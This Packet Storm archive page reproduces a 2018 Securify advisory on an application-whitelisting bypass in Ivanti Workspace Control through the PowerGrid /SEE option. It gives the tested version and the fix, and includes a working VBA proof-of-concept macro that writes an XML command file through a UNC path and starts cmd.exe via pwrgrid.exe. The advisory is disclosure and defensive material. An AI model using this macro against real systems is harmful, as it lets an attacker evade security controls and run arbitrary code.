what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Ivanti Workspace Control Application PowerGrid SEE Whitelist Bypass

Ivanti Workspace Control Application PowerGrid SEE Whitelist Bypass
Posted Oct 1, 2018
Authored by Yorick Koster, Securify B.V.

It was found that the PowerGrid application can be used to run arbitrary commands via the /SEE command line option. An attacker can abuse this issue to bypass Application Whitelisting in order to run arbitrary code on the target machine. This issue was successfully verified on Ivanti Workspace Control version 10.2.950.0.

tags | exploit, arbitrary, bypass
SHA-256 | d22755c11b4351cbedb8fccbfeb8f10b0a0fd56433daae7099f4a1f97ebe9bcb

Ivanti Workspace Control Application PowerGrid SEE Whitelist Bypass

Change Mirror Download
------------------------------------------------------------------------
Ivanti Workspace Control Application Whitelist bypass via PowerGrid /SEE
command line argument
------------------------------------------------------------------------
Yorick Koster, August 2018

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the PowerGrid application can be used to run arbitrary
commands via the /SEE command line option. An attacker can abuse this
issue to bypass Application Whitelisting in order to run arbitrary code
on the target machine.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Ivanti Workspace Control version
10.2.950.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is mitigated in Ivanti Workspace Control version 10.3.0.0.
The fix included in this version prevents the creation of XML files
within the WMTemp folder, effectively preventing this issue from being
exploited.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20180806/ivanti-workspace-control-application-whitelist-bypass-via-powergrid-_see-command-line-argument.html

Workspace Control creates a temporary folder WMTemp under the logged on user's AppData folder. This folder is protected by the FileGuard Minifilter driver, meaning that the logged on user is not allowed to create or modify files within this folder. Some Workspace Control applications will create XML files in this folder, which is allowed by FileGuard. These XML files contain commands that need to be started by PowerGrid. After the XML file is created, PowerGrid is invoked with the /SEE command line argument, and the file name of the XML file that needs to be processed. PowerGrid will load the file from the WMTemp folder, and run the command as is configured in the XML file.

Normally, FileGuard will prevent the execution of arbitrary commands, because the user can't create any new files within the WMTemp folder. By abusing another vulnerability in Workspace Control it is possible to bypass FileGuard to create XML files within the WMTemp file. By doing so it is possible for an attacker to bypass Application Whitelisting in order to run arbitrary commands.


Proof of concept

The VBA code below demonstrates this issue. The code tries to run cmd.exe using the /SEE command line argument.

Private Declare PtrSafe Function GetCurrentProcessId Lib "kernel32.dll" () As Integer
Private Declare PtrSafe Function ProcessIdToSessionId Lib "kernel32.dll" (ByVal dwProcessId As Integer, ByRef pSessionId As Integer) As Integer

Private Sub PowerGridAWLBypass()
On Error Resume Next
Dim SessionID As Integer
Dim appDataPath, resPath
If ProcessIdToSessionId(GetCurrentProcessId, SessionID) = 0 Then
SessionID = 1
End If
appDataPath = Replace(UCase(Environ("LOCALAPPDATA")), "C:", "\\localhost\C$")
resPath = Environ("RESPFDIR")
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(appDataPath & "\RES\WM\" & SessionID & "\WMTemp\foo.xml")
oFile.WriteLine "<foo><file>cmd.exe</file><showcmd>5</showcmd></foo>"
oFile.Close
Set fso = Nothing
Set oFile = Nothing
Shell resPath & "\pwrgrid.exe /SEE foo.xml", vbNormalFocus
End Sub


Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close